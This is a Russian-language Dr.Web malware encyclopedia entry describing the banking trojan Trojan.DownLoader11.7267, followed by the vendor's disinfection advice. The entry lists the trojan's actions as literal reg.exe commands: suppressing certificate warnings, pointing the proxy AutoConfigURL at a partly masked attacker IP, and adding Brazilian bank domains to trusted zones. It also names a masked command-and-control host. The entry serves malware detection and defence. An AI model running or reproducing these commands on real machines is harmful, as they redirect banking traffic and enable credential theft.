Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.DownLoader11.7267

Добавлен в вирусную базу Dr.Web: 2014-05-07

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run] 'Java Quick Starter' = '%TEMP%\jusched.exe'
Вредоносные функции:
Создает и запускает на исполнение:
  • '%TEMP%\jusched.exe'
Запускает на исполнение:
  • '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t REG_DWORD /d 00000000 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t REG_DWORD /d 00000000 /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t REG_DWORD /d 00000000 /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t REG_DWORD /d 00000000 /f
  • '<SYSTEM32>\reg.exe' add "HKU\S-1-5-21-2052111302-484763869-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t REG_DWORD /d 00000001 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "http://11#.#11.111.1/bootsts.txt" /f
  • '<SYSTEM32>\reg.exe' add "HKU\S-1-5-21-2052111302-484763869-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.bancoreal" /v "http" /t REG_DWORD /d "0x00000002" /f
  • '<SYSTEM32>\reg.exe' add "HKU\S-1-5-21-2052111302-484763869-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.bancodobrasil" /v "http" /t REG_DWORD /d "0x00000002" /f
  • '<SYSTEM32>\reg.exe' add "HKU\S-1-5-21-2052111302-484763869-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.certisign" /v "http" /t REG_DWORD /d "0x00000002" /f
  • '<SYSTEM32>\find.exe' /i"java.policy"
  • '<SYSTEM32>\reg.exe' add "HKU\S-1-5-21-2052111302-484763869-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.real" /v "http" /t REG_DWORD /d "0x00000002" /f
  • '<SYSTEM32>\reg.exe' add "HKU\S-1-5-21-2052111302-484763869-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.santanderbanespa" /v "http" /t REG_DWORD /d "0x00000002" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
  • '<SYSTEM32>\reg.exe' add "HKU\S-1-5-21-2052111302-484763869-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\gov.br\*.infoseg" /v "http" /t REG_DWORD /d "0x00000002" /f
  • '<SYSTEM32>\reg.exe' add "HKU\S-1-5-21-2052111302-484763869-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.bb" /v "http" /t REG_DWORD /d "0x00000002" /f
  • '<SYSTEM32>\reg.exe' add "HKU\S-1-5-21-2052111302-484763869-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.santander" /v "http" /t REG_DWORD /d "0x00000002" /f
  • '<SYSTEM32>\ping.exe' -n 1 -l 1 oi.buscaimplacavel.com
  • '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run" /v "Java Quick Starter" /t REG_SZ /d "%TEMP%\jusched.exe" /f
  • '<SYSTEM32>\find.exe' /i"TTL"
  • '<SYSTEM32>\attrib.exe' -r -a -s -h "%APPDATA%\Mozilla\Firefox\Profiles\cwdgt0y8.default\prefs.js"
  • '<SYSTEM32>\find.exe' /i"prefs.js"
  • '<SYSTEM32>\find.exe' /i "5.1.2"
  • '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\mine9.bat" > NUL"
  • '<SYSTEM32>\find.exe' /i "6.0.6"
  • '<SYSTEM32>\find.exe' /i "5.00.2"
  • '<SYSTEM32>\find.exe' /i "6.1.7600"
  • '<SYSTEM32>\find.exe' /i"GroupMembership"
  • '<SYSTEM32>\reg.exe' export "HKLM\Software\Microsoft\Windows\CurrentVersion\Group Policy" \JET2507F.tmp
  • '<SYSTEM32>\find.exe' /i"S-1-5-21"
  • '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t REG_DWORD /d 00000001 /f
  • '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "http://11#.#11.111.1/bootsts.txt" /f
  • '<SYSTEM32>\attrib.exe' -r -a -s -h "%PROGRAM_FILES%\FireFox\defaults\pref\channel-prefs.js"
  • '<SYSTEM32>\attrib.exe' -r -a -s -h "%PROGRAM_FILES%\FireFox\greprefs.js"
  • '<SYSTEM32>\attrib.exe' -r -a -s -h "%PROGRAM_FILES%\FireFox\defaults\profile\prefs.js"
  • '<SYSTEM32>\attrib.exe' <Служебный элемент>
  • '<SYSTEM32>\attrib.exe' -r -a -s -h "%PROGRAM_FILES%\FireFox\modules\services-sync\engines\prefs.js"
Изменяет следующие настройки браузера Windows Internet Explorer:
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings] 'WarnonBadCertRecving' = '00000000'
Изменения в файловой системе:
Создает следующие файлы:
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\access[1].php
  • C:\JET2507F.tmps
  • C:\JET2507F.tmp
  • %TEMP%\jusched.exe
  • %APPDATA%\mine9.bat
Удаляет следующие файлы:
  • %APPDATA%\mine9.bat
  • C:\JET2507F.tmps
  • C:\JET2507F.tmp
Сетевая активность:
Подключается к:
  • 'co#####e.redirecton.com':80
  • 'localhost':1037
TCP:
Запросы HTTP GET:
  • co#####e.redirecton.com/access.php?CP#############################
UDP:
  • DNS ASK co#####e.redirecton.com
  • DNS ASK oi.####aimplacavel.com
Другое:
Ищет следующие окна:
  • ClassName: 'MS_AutodialMonitor' WindowName: '(null)'
  • ClassName: 'MS_WebcheckMonitor' WindowName: '(null)'
  • ClassName: '' WindowName: '(null)'
  • ClassName: 'EDIT' WindowName: '(null)'
  • ClassName: 'Shell_TrayWnd' WindowName: '(null)'
Изменяет значение AutoConfigURL

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке